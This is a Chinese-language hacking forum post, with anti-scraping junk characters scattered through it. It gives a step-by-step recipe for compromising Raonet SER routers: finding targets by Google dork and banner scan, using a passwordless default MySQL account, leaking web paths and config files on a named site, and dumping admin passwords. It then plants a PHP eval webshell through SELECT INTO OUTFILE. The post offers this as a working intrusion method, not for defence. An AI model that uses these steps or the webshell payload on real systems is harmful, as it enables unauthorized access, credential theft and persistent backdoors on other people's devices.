寻找存在漏洞的路由器方法:# u5 k( w5 N5 |! p
4 \$ q% a: C4 K& X4 A1 M1:google搜索'Raonet Subscriber Ethernet Router'% y/ t3 p+ ]. n
) B) t$ C3 k6 K1 c7 S
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20012 r; g0 S1 S3 j# ]; x
( ^6 Y& {8 Z8 _( {* w0 d3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。$ v. ~' r; y6 p
1 u3 S: N4 C* e# P) W$ b) Q
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......( Z% P$ u E. B. a6 e+ u
1 `6 o2 T, v. U7 z; ^) l6 g $ M- B2 }9 ]% e1 i4 H1 c9 |5 @8 f
9 m% ]7 ]4 t$ ^) [# C入侵步骤:
7 I- n! N7 W( I1 z- K7 F4 e# w% F1 q
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
. S9 P& P g) I' A# f" a) T* {) D" x0 I; d4 a9 Z9 P0 G
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
& R3 D7 ^$ a$ c' x: {5 w# i3 T3:得到密码后连接,查看GUI管理密码:
% ?9 {8 S7 g. J/ x6 {use ser_500# g4 s* e* \: ?9 W! z* I
select id,passwd from user;4 o6 ?6 t* o: P8 D7 I0 D- m8 j% C+ E
4:通过数据库写入webshell,执行命令:3 C5 e* Z8 W! S; B( j
use mysql;
" h" Z' i7 t) S! ^" ecreate table ok(cmd TEXT);
2 F- n2 `" w1 Dinsert into ok values("<?php @eval($_POST[cmd])?>");
% }0 H, K& f; {select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
& L9 E6 j% z# p- ydrop table ok;
) b6 A4 z8 t5 E5 k
- @# ~+ M7 ?6 M/ g5:连接后门shell.php 6 [# N$ W! n( G
6 k) E6 ]5 D+ \; A0 [6. 搞定!3 I# T6 M! G- v, C
# `3 E" x+ s3 o2 ?9 _, N- T
|